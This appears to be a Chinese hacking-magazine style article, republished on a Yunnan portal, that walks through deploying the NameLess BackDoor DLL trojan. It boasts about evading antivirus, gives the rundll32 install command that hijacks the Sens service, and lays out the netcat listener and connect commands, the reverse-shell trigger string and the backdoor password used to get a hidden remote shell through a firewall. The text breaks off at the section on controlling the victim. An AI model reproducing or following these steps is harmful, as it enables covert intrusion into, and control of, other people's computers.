云南龙网

  1. 首页 > 云知道 > >

气疯安全工具—新兴DLL型木马复仇记

云知道

NameLess BackDoor是一款新兴的DLL型木马 , 这个木马出世没多久 , 但绝对是一匹极有潜质的千里驹 。
说起NameLess BackDoor的前身来 , 不得不提及榕哥的BITS和WinEggDrop的PortLess 。这两款大名鼎鼎的木马曾经都风光一时 , 可以说是木马界的元老了 。而NameLess BackDoor则是汇集了上面这两款木马的优点 , 在目标机器的进程管理器中看不到 , 平时没有端口 , 提供正向连接和反向连接两种功能 。同时NameLess BackDoor又去除了各处的缺点 , 比如反弹的cmd.exe进程 , 在目标机器的进程管理中也可以隐藏无需利用BITS服务等(马儿:不开端口 , 无进程 , 看看防火墙和杀毒软件还能拿我怎么办!气死你 , 哈哈) 。
NameLess BackDoor实战演练
将NameLess BackDoor安装上远程主机到连接木马控制主机 , 就像一场进行在杀毒软件和防火墙眼皮底下 , 却又无声无悄的暗战 。
一、随风潜入夜——安装
下载NameLess BackDoor木马 , 压缩包中有两个名为NameLess.dll的DLL文件 , 一个Pack压缩加过壳的 , 一个是Unpack未压缩加壳的 。先在本地用各种杀毒软件扫描一下这两个文件(笔者用的是最新病毒库的KV2005) , 但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见 。呵 , 这下子可以放心的在任何环境下进行安装了 。
怎么将木马安装到远程的电脑上呢?当然最简单的就是扫描要攻击电脑上的系统漏洞 , 然后进行攻击入侵控制 。方法很多了 , 反正你拿到远程主机的控制权后 , 将上面的任意一个“NameLess.dll”文件上传到远程主机上的 。在这里笔者是使用Ttelnet远程连接后 , 写入一个FTP下载的BAT文件 , 直接在本地建立了一个FTP服务器 , 通过FTP服务器下载上传文件的(这些内容以前杂志介绍过 , 这里就不作过多的讲解啦) 。下面重点来看看我是怎样安装木马文件的吧!
【气疯安全工具—新兴DLL型木马复仇记】在远程Ttelnet命令窗口中切换到文件上传目录中 , 并输入如下命令(如图1):
Rundll32 NameLess.dll,Install
执行该命令后后门就被安装成功了 , 后门会自动替换系统服务Sens的ServiceDll文件 , 在电脑重启后以Svchost.exe启动 。
小提示:由于NameLess BackDoor是一个DLL型木马 , 因此在安装和启动的过程中 , 远程主机上的杀毒软件不会有任何提示和反应 。
二、穿墙细无声——连接
安装和启动的过程中顺利地搞定了杀毒软件 , 下面看看NameLess BackDoor怎么让防火墙无能为力的 。

小提示:NameLess BackDoor有两种连接方式:正向连接和反向连接 , 其中反向方式连接可以让防火墙不会发出任何提示 。同时NameLess BackDoor在连接后门时使用了端口复用技术 , 通过重用系统进程开放的任意一个端口 , 因此可以轻松的穿透各种防火墙 。
我们首先需要扫描远程主机上开放了哪些端口 , 假设某台远程主机(IP地址为:192.168.1.11)上开放了139端口 , 那么可以本地打开一个命令窗口 , 切换到瑞士军刀NC所在的目录中 , 运行如下命令:
nc
-l -p 12345
命令执行后将在本地监听12345端口 , 然后再打开一个命令窗口 , 输入如下命令(如图2):

nc 192.168.1.11 139

建立连接后输入如下内容(如图3):
dargun|192.168.1.11:12345
其中的IP地址可根据具体情况进行更改 。命令执行后 , 在刚才的监听窗口中就可以看到出现了连接提示:“Enter Password:” , 输入密码158352692后就可以成功的登陆远程主机而不被防火墙发现了!(如果我是防火墙 , 一定气疯了 , 哈)
三、为我所欲为——控制
成功“气死”杀毒软件和“逼疯”防火墙后 , 现在就可以控制远程主机了 。NameLess

推荐阅读


上一篇:什么不舍的四字成语

下一篇:臻品磨毛面料和纯棉面料的区别